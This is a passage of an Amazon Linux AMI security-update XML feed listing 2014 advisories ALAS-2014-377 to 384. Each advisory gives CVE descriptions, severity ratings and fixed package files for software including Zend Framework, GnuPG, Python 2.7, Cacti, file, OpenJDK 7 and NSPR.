</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240" title="" id="CVE-2014-0240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242" title="" id="CVE-2014-0242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_wsgi-debuginfo" version="3.2" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_wsgi-debuginfo-3.2-6.8.amzn1.x86_64.rpm</filename></package><package name="mod_wsgi" version="3.2" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_wsgi-3.2-6.8.amzn1.x86_64.rpm</filename></package><package name="mod_wsgi-debuginfo" version="3.2" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod_wsgi-debuginfo-3.2-6.8.amzn1.i686.rpm</filename></package><package name="mod_wsgi" version="3.2" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod_wsgi-3.2-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-377</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-377: important priority package update for php-ZendFramework</title><issued date="2014-07-23 13:39:00" /><updated date="2014-09-19 10:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2685:
1081288:
CVE-2014-2684 CVE-2014-2685 php-ZendFramework: OpenID identity provider could be used to spoof other identity providers (ZF2014-02)
CVE-2014-2684:
1081288:
CVE-2014-2684 CVE-2014-2685 php-ZendFramework: OpenID identity provider could be used to spoof other identity providers (ZF2014-02)
CVE-2014-2683:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
CVE-2014-2682:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
CVE-2014-2681:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2681" title="" id="CVE-2014-2681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2682" title="" id="CVE-2014-2682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2683" title="" id="CVE-2014-2683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2684" title="" id="CVE-2014-2684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2685" title="" id="CVE-2014-2685" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Pdf" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package 
name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.5" release="1.8.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.5-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-378</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-378: medium priority package update for gnupg</title><issued date="2014-07-23 13:50:00" /><updated date="2014-09-19 10:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4617:
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
1112509:
CVE-2014-4617 gnupg: infinite loop when decompressing data packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4617" title="" id="CVE-2014-4617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg-debuginfo" version="1.4.18" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.18-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.18" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.18-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.18" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.18-1.25.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.18" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.18-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-379</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-379: medium priority package update for gnupg2</title><issued date="2014-07-23 13:51:00" /><updated date="2014-09-19 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4617:
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
1112509:
CVE-2014-4617 gnupg: infinite loop when decompressing data packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4617" title="" id="CVE-2014-4617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.24-1.25.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.24-1.25.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.24-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-380</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-380: medium priority package update for python27</title><issued date="2014-07-23 13:53:00" /><updated date="2014-09-19 10:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4616:
1112285:
CVE-2014-4616 python: missing boundary check in JSON module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616" title="" id="CVE-2014-4616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-libs" 
version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-13.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-381</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-381: medium priority package update for cacti</title><issued date="2014-07-23 13:54:00" /><updated date="2014-09-19 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4002:
Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b allow remote attackers to inject arbitrary web script or HTML via the (1) drp_action parameter to cdef.php, (2) data_input.php, (3) data_queries.php, (4) data_sources.php, (5) data_templates.php, (6) graph_templates.php, (7) graphs.php, (8) host.php, or (9) host_templates.php or the (10) graph_template_input_id or (11) graph_template_id parameter to graph_templates_inputs.php.
1113035:
CVE-2014-4002 cacti: Cross-Site Scripting Vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4002" title="" id="CVE-2014-4002" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="7.5.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-7.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-382</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-382: medium priority package update for file</title><issued date="2014-07-23 13:57:00" /><updated date="2014-09-19 15:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3538:
file before 5.19 does not properly restrict the amount of data read during a regex search, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted file that triggers backtracking during processing of an awk rule. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-7345.
1098222:
CVE-2014-3538 file: extensive backtracking in awk rule regular expression (incomplete fix for CVE-2013-7345)
CVE-2014-3487:
The cdf_read_property_info function in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate a stream offset, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file.
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
The cdf_count_chain function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate sector-count data, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file.
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file.
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
Buffer overflow in the mconvert function in softmagic.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (application crash) via a crafted Pascal string in a FILE_PSTRING conversion.
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
CVE-2014-0207:
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538" title="" id="CVE-2014-3538" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-magic" version="5.19" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-1.18.amzn1.noarch.rpm</filename></package><package name="file" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.19" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/file-static-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-383</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-383: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-07-23 14:01:00" /><updated date="2014-09-19 11:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4266:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4263:
The Diffie-Hellman (DH) key exchange algorithm implementation in the Security component in OpenJDK failed to validate public DH parameters properly. This could cause OpenJDK to accept and use weak parameters, allowing an attacker to recover the negotiated key.
CVE-2014-4262:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-4252:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4244:
It was discovered that the RSA algorithm in the Security component in OpenJDK did not sufficiently perform blinding while performing operations that were using private keys. An attacker able to measure timing differences of those operations could possibly leak information about the used keys.
CVE-2014-4223:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-4221:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4219:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4218:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4216:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4209:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2490:
A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.
CVE-2014-2483:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2483" title="" id="CVE-2014-2483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2490" title="" id="CVE-2014-2490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4209" title="" id="CVE-2014-4209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4216" title="" id="CVE-2014-4216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4218" title="" id="CVE-2014-4218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4219" title="" id="CVE-2014-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4221" title="" id="CVE-2014-4221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4223" title="" id="CVE-2014-4223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4244" title="" id="CVE-2014-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4252" title="" id="CVE-2014-4252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4262" title="" id="CVE-2014-4262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4263" title="" id="CVE-2014-4263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4266" title="" id="CVE-2014-4266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0889.html" title="" id="RHSA-2014:0889" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.65-2.5.1.2.43.amzn1.noarch.rpm</filename></package><package 
name="java-1.7.0-openjdk-src" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-384</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-384: critical priority package update for nspr</title><issued date="2014-07-23 14:07:00" /><updated date="2014-09-19 11:38:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1545:
Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write) via vectors involving the sprintf and console functions.
1107432:
CVE-2014-1545 Mozilla: Out of bounds write in NSPR (MFSA 2014-55)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545" title="" id="CVE-2014-1545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.4-1.22.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.4-1.22.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.4-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 